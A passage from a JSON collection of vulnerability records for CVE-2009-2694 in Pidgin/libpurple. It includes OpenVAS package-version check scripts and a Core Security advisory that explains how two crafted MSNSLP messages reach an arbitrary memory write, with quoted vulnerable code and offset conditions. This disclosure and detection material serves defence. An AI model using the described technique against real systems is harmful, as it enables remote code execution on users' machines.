Technologies discovered a flaw in Pidgin's\nMSN protocol handler. If a user received a malicious MSN message, it was\npossible to execute arbitrary code with the permissions of the user running\nPidgin. (CVE-2009-2694)\n\nNote: Users can change their privacy settings to only allow messages from\nusers on their buddy list to limit the impact of this flaw.\n\nThese packages upgrade Pidgin to version 2.5.9. Refer to the Pidgin release\nnotes for a full list of changes: http://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users should upgrade to these updated packages, which resolve\nthis issue. Pidgin must be restarted for this update to take effect.", "modified": "2017-07-12T00:00:00", "published": "2009-09-02T00:00:00", "id": "OPENVAS:64666", "href": "http://plugins.openvas.org/nasl.php?oid=64666", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1218", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1218.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1218 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1218.\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nFederico Muttis of Core Security Technologies discovered a flaw in Pidgin's\nMSN protocol handler. If a user received a malicious MSN message, it was\npossible to execute arbitrary code with the permissions of the user running\nPidgin. (CVE-2009-2694)\n\nNote: Users can change their privacy settings to only allow messages from\nusers on their buddy list to limit the impact of this flaw.\n\nThese packages upgrade Pidgin to version 2.5.9. Refer to the Pidgin release\nnotes for a full list of changes: http://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users should upgrade to these updated packages, which resolve\nthis issue. Pidgin must be restarted for this update to take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_id(64666);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2694\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:1218\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1218.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~1.5.1~4.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-debuginfo\", rpm:\"pidgin-debuginfo~1.5.1~4.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"finch\", rpm:\"finch~2.5.9~1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"finch-devel\", rpm:\"finch-devel~2.5.9~1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple\", rpm:\"libpurple~2.5.9~1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-devel\", rpm:\"libpurple-devel~2.5.9~1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-perl\", rpm:\"libpurple-perl~2.5.9~1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-tcl\", rpm:\"libpurple-tcl~2.5.9~1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~2.5.9~1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-debuginfo\", rpm:\"pidgin-debuginfo~2.5.9~1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-devel\", rpm:\"pidgin-devel~2.5.9~1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-perl\", rpm:\"pidgin-perl~2.5.9~1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"finch\", rpm:\"finch~2.5.9~1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple\", rpm:\"libpurple~2.5.9~1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-perl\", rpm:\"libpurple-perl~2.5.9~1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-tcl\", rpm:\"libpurple-tcl~2.5.9~1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~2.5.9~1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-debuginfo\", rpm:\"pidgin-debuginfo~2.5.9~1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-perl\", rpm:\"pidgin-perl~2.5.9~1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"finch-devel\", rpm:\"finch-devel~2.5.9~1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-devel\", rpm:\"libpurple-devel~2.5.9~1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-devel\", rpm:\"pidgin-devel~2.5.9~1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2694"], "description": "The remote host is missing an update to pidgin\nannounced via advisory FEDORA-2009-8874.", "modified": "2017-07-10T00:00:00", "published": "2009-09-02T00:00:00", "id": "OPENVAS:64727", "href": "http://plugins.openvas.org/nasl.php?oid=64727", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-8874 (pidgin)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8874.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8874 (pidgin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\n2.6.1 fixes an issue where pidgin can crash if you are sent a certain type of\nURL over Yahoo.\n\nChangeLog:\n\n* Wed Aug 19 2009 Warren Togami 2.6.1-1\n- 2.6.1: Fix a crash when some users send you a link in a Yahoo IM\n* Tue Aug 18 2009 Warren Togami 2.6.0-1\n- CVE-2009-2694\n- Voice and Video support via farsight2 (Fedora 11+)\n- Numerous other bug fixes\n* Thu Aug 6 2009 Warren Togami 2.6.0-0.11.20090812\n- new snapshot at the request of maiku\n* Thu Aug 6 2009 Warren Togami 2.6.0-0.10.20090806\n- new snapshot - theoretically better sound quality in voice chat\n* Tue Aug 4 2009 Warren Togami 2.6.0-0.9.20090804\n- new snapshot\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update pidgin' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8874\";\ntag_summary = \"The remote host is missing an update to pidgin\nannounced via advisory FEDORA-2009-8874.\";\n\n\n\nif(description)\n{\n script_id(64727);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2694\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-8874 (pidgin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"finch\", rpm:\"finch~2.6.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"finch-devel\", rpm:\"finch-devel~2.6.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple\", rpm:\"libpurple~2.6.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-devel\", rpm:\"libpurple-devel~2.6.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-perl\", rpm:\"libpurple-perl~2.6.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-tcl\", rpm:\"libpurple-tcl~2.6.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~2.6.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-devel\", rpm:\"pidgin-devel~2.6.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-docs\", rpm:\"pidgin-docs~2.6.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-perl\", rpm:\"pidgin-perl~2.6.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-debuginfo\", rpm:\"pidgin-debuginfo~2.6.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2694"], "description": "The remote host is missing an update to pidgin\nannounced via advisory FEDORA-2009-8874.", "modified": "2018-04-06T00:00:00", "published": "2009-09-02T00:00:00", "id": "OPENVAS:136141256231064727", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064727", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-8874 (pidgin)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8874.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8874 (pidgin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\n2.6.1 fixes an issue where pidgin can crash if you are sent a certain type of\nURL over Yahoo.\n\nChangeLog:\n\n* Wed Aug 19 2009 Warren Togami 2.6.1-1\n- 2.6.1: Fix a crash when some users send you a link in a Yahoo IM\n* Tue Aug 18 2009 Warren Togami 2.6.0-1\n- CVE-2009-2694\n- Voice and Video support via farsight2 (Fedora 11+)\n- Numerous other bug fixes\n* Thu Aug 6 2009 Warren Togami 2.6.0-0.11.20090812\n- new snapshot at the request of maiku\n* Thu Aug 6 2009 Warren Togami 2.6.0-0.10.20090806\n- new snapshot - theoretically better sound quality in voice chat\n* Tue Aug 4 2009 Warren Togami 2.6.0-0.9.20090804\n- new snapshot\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update pidgin' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8874\";\ntag_summary = \"The remote host is missing an update to pidgin\nannounced via advisory FEDORA-2009-8874.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64727\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2694\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-8874 (pidgin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"finch\", rpm:\"finch~2.6.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"finch-devel\", rpm:\"finch-devel~2.6.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple\", rpm:\"libpurple~2.6.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-devel\", rpm:\"libpurple-devel~2.6.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-perl\", rpm:\"libpurple-perl~2.6.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-tcl\", rpm:\"libpurple-tcl~2.6.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~2.6.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-devel\", rpm:\"pidgin-devel~2.6.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-docs\", rpm:\"pidgin-docs~2.6.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-perl\", rpm:\"pidgin-perl~2.6.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-debuginfo\", rpm:\"pidgin-debuginfo~2.6.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:31", "bulletinFamily": "software", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-2694"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - CoreLabs Advisory\r\n http://www.coresecurity.com/corelabs/\r\n\r\nLibpurple msn_slplink_process_msg() Arbitrary Write Vulnerability\r\n\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Libpurple msn_slplink_process_msg() Arbitrary Write Vulnerability\r\nAdvisory ID: CORE-2009-0727\r\nAdvisory URL: http://www.coresecurity.com/content/libpurple-arbitrary-write\r\nDate published: 2009-08-18\r\nDate of last update: 2009-08-18\r\nVendors contacted: Pidgin team\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Memory corruption\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nBugtraq ID:\r\nCVE Name: CVE-2009-2694\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nPidgin (formerly named Gaim) is a multi-platform instant messaging\r\nclient, based on a library named libpurple. Libpurple has support for\r\nmany commonly used instant messaging protocols, allowing the user to log\r\ninto various different services from one application.\r\n\r\nA remote arbitrary-code-execution vulnerability has been found in\r\nLibpurple (used by Pidgin and Adium instant messaging clients, among\r\nothers), which can be triggered by a remote attacker by sending a\r\nspecially crafted MSNSLP packet [4] with invalid data to the client\r\nthrough the MSN server. No victim interaction is required, and the\r\nattacker is not required to be in the victim's buddy list (under default\r\nconfiguration).\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . Gaim >= 0.79\r\n . Libpurple <= 2.5.8 (Pidgin <= 2.5.8 and Adium <= 1.3.5)\r\n . Other Libpurple frontends such as Finch might be vulnerable as well.\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . Libpurple >= 2.6.0 (Pidgin >= 2.6.0)\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nThe default privacy settings allow any remote entity to contact an MSN\r\nuser, so the attacker is not required to be in the victim's buddy list.\r\nThe attack can be mitigated by setting the privacy settings for MSN\r\naccounts to "Allow only the users below" (by default, the list of people\r\non the buddy list).\r\n\r\n\r\n7. *Credits*\r\n\r\nThis vulnerability was discovered and researched by Federico Muttis from\r\nCore Security Technologies.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\n\r\n8.1. *Overview*\r\n\r\nThe flaw exists within the function 'msn_slplink_process_msg()' of\r\nLibpurple <= 2.5.8, which fails to properly validate an offset value\r\nspecified in a MSNSLP packet [4].\r\n\r\nThis affects at least two widely used products: Pidgin <= 2.5.8 [1] and\r\nAdium <= 1.3.5 [2].\r\n\r\nAccording to their website [3], Libpurple is also used by:\r\n\r\n . Apollo IM - IM application for the iPhone and iPod Touch.\r\n . EQO - an IM program for mobile phones.\r\n . Finch - a text-based IM program that works well in Linux and other\r\nUnixes.\r\n . Instantbird - a graphical IM program based on Mozilla's XUL framework.\r\n . Meebo - a web-based IM program.\r\n . Telepathy-Haze - a connection manager for the Telepathy IM framework.\r\n\r\n These programs may also be vulnerable.\r\n\r\nIf the victim has its privacy settings set to "everyone can contact me",\r\nthe victim is not required to be in the attacker's contact list.\r\nOtherwise that is the only requirement for exploitation and no other\r\nvictim interaction is required.\r\n\r\nBy sending a specially crafted packet, an attacker can write an\r\narbitrary address with controlled data, resulting in arbitrary code\r\nexecution.\r\n\r\n\r\n8.2. *Previous patches*\r\n\r\nA similar vulnerability was already reported in CVE-2008-2927 [5] and\r\nCVE-2009-1376 [6]. CVE-2008-2927 added some bounds checking in\r\n'msn_slplink_process_msg()', specifically:\r\n\r\n/-----------\r\n\r\nif (G_MAXSIZE - len < offset || (offset='' + len='') > slpmsg->size)\r\n{\r\n .. discard packet ..\r\n} else {\r\n .. vulnerable memcpy ..\r\n}\r\n\r\n- -----------/\r\n\r\n CVE-2009-1376 demonstrates that this can be exploited. The idea of the\r\npatch for CVE-2009-1376 was to fix a casting error, where an unsigned 64\r\nbits integer was casted to an unsigned 32 bits integer in the following\r\nline:\r\n\r\n/-----------\r\n\r\ndeclaration of offset;\r\n...\r\noffset = msg->msnslp_header.offset;\r\n\r\n- -----------/\r\n\r\n\r\n\r\nThe declaration of offset was changed from 'gsize' to 'guint64' in\r\n2.5.8. This approach is clearly not enough, we found that by providing\r\ndifferent size/offset values, the call to memcpy() can still be reached\r\nwith almost any value. The first PoC we constructed to trigger this\r\nvulnerability was fixed by the patch introduced in Libpurple 2.5.6, but\r\nby working on it a little more, we triggered the bug again in Libpurple\r\n2.5.8. We conclude that the fix was incomplete.\r\n\r\n\r\n8.3. *Exploitation of Libpurple 2.5.8*\r\n\r\nThe attack consists in sending two consecutive MSNSLP messages [4]. The\r\nfirst one is used to store a 'slpmsg' with our session id, and the\r\nsecond one to trigger the vulnerability.\r\n\r\nOur goal is to reach the 'memcpy()' invocation in\r\n'msn_slplink_process_msg()'. We need to construct a MSNSLP message with\r\nan offset different from zero (as this value will be the destination of\r\nthe vulnerable 'memcpy()').\r\n\r\nAs the offset will be different from zero, the first problem arises when\r\na call to 'msn_slplink_message_find()' returns NULL:\r\n\r\n/-----------\r\n\r\nif (offset == 0)\r\n{\r\n .. construct a new slpmsg ..\r\n}\r\nelse\r\n{\r\n slpmsg = msn_slplink_message_find(slplink,\r\nmsg->msnslp_header.session_id, msg->msnslp_header.id);\r\n}\r\n\r\nif (slpmsg == NULL)\r\n{\r\n /* Probably the transfer was canceled */\r\n purple_debug_error("msn", "Couldn't find slpmsg\n");\r\n return;\r\n}\r\n\r\n- -----------/\r\n\r\n So, 'slpmsg' must be different from NULL. And this is exactly why this\r\nis a two-message attack. We need to send a first MSNSLP message, with an\r\noffset equal to zero, that constructs a slpmsg object, so Libpurple will\r\nstore it. The second MSNSLP message will have an offset value different\r\nfrom zero, but as Libpurple stored our first MSNSLP message, the call to\r\n'msn_slplink_message_find()' will effectively return our previous\r\nobject, instead of NULL.\r\n\r\nSo we reach:\r\n\r\n/-----------\r\n\r\nif (slpmsg->fp)\r\n{\r\n /* fseek(slpmsg->fp, offset, SEEK_SET); */\r\n len = fwrite(data, 1, len, slpmsg->fp);\r\n}\r\nelse if (slpmsg->size)\r\n{\r\n if (G_MAXSIZE - len < offset || (offset='' + len='') > slpmsg->size)\r\n {\r\n purple_debug_error("msn",\r\n "Oversized slpmsg - msgsize=%lld offset=%" G_GSIZE_FORMAT "\r\nlen=%" G_GSIZE_FORMAT "\n",\r\n slpmsg->size, offset, len);\r\n g_return_if_reached();\r\n }\r\n else\r\n memcpy(slpmsg->buffer + offset, data, len);\r\n }\r\n\r\n- -----------/\r\n\r\n For example, if we construct our first MSNSLP message with a size of\r\n'0x01ffffff', and the second one (which is being processed and whose\r\noffset is assigned to the offset variable) has an offset of an arbitrary\r\nvalue lower than '0x01ffffff - len', then the conditions for an\r\narbitrary write are met.\r\n\r\nFinally, we reach 'memcpy()' with an offset of any value lower than\r\n'0x01ffffff - len' and the buffer pointing to 0. This means that we can\r\nwrite the contents of data in an arbitrary location lower than\r\n'0x01ffffff - len', which allows arbitrary code execution in almost any\r\nplatform.\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2009-07-28:\r\nCore Security Technologies notifies the Pidgin team of the vulnerability\r\nand schedules a preliminary publication date to August 18th.\r\n\r\n. 2009-07-28:\r\nPidgin team requests technical details (in plaintext or encrypted).\r\n\r\n. 2009-07-30:\r\nCore sends the advisory draft, encrypted, including technical details.\r\n\r\n. 2009-07-30:\r\nPidgin team acknowledges reception of the draft.\r\n\r\n. 2009-07-31:\r\nPidgin team notifies Core that they cannot reproduce the bug.\r\n\r\n. 2009-07-31:\r\nCore sends proof of concept code to the Pidgin team.\r\n\r\n. 2009-08-10:\r\nCore requests the Pidgin team an update on the bug status and fixes.\r\n\r\n. 2009-08-13:\r\nPidgin team confirms Core that fixes will be ready by August 18th, and\r\nsends information regarding affected versions and mitigations.\r\n\r\n. 2009-08-13:\r\nCore acknowledges the information sent by Pidgin team.\r\n\r\n. 2009-08-18:\r\nThe advisory CORE-2009-0727 is published.\r\n\r\n\r\n\r\n10. *References*\r\n\r\n[1] Pidgin http://www.pidgin.im/\r\n[2] Adium http://adium.im/\r\n[3] Libpurple http://developer.pidgin.im/wiki/WhatIsLibpurple\r\n[4] MSNSLP http://msnpiki.msnfanatic.com/index.php/MSNC:MSNSLP\r\n[5] CVE-2008-2927\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2927\r\n[6] CVE-2009-1376\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1376\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://www.coresecurity.com/corelabs.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies develops strategic solutions that help\r\nsecurity-conscious organizations worldwide develop and maintain a\r\nproactive process for securing their networks. The company's flagship\r\nproduct, CORE IMPACT, is the most comprehensive product for performing\r\nenterprise security assurance testing. CORE IMPACT evaluates network,\r\nendpoint and end-user vulnerabilities and identifies what resources are\r\nexposed. It enables organizations to determine if current security\r\ninvestments are detecting and preventing attacks. Core Security\r\nTechnologies augments its leading technology solution with world-class\r\nsecurity consulting services, including penetration testing and software\r\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\r\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2009 Core Security\r\nTechnologies and (c) 2009 CoreLabs, and may be distributed 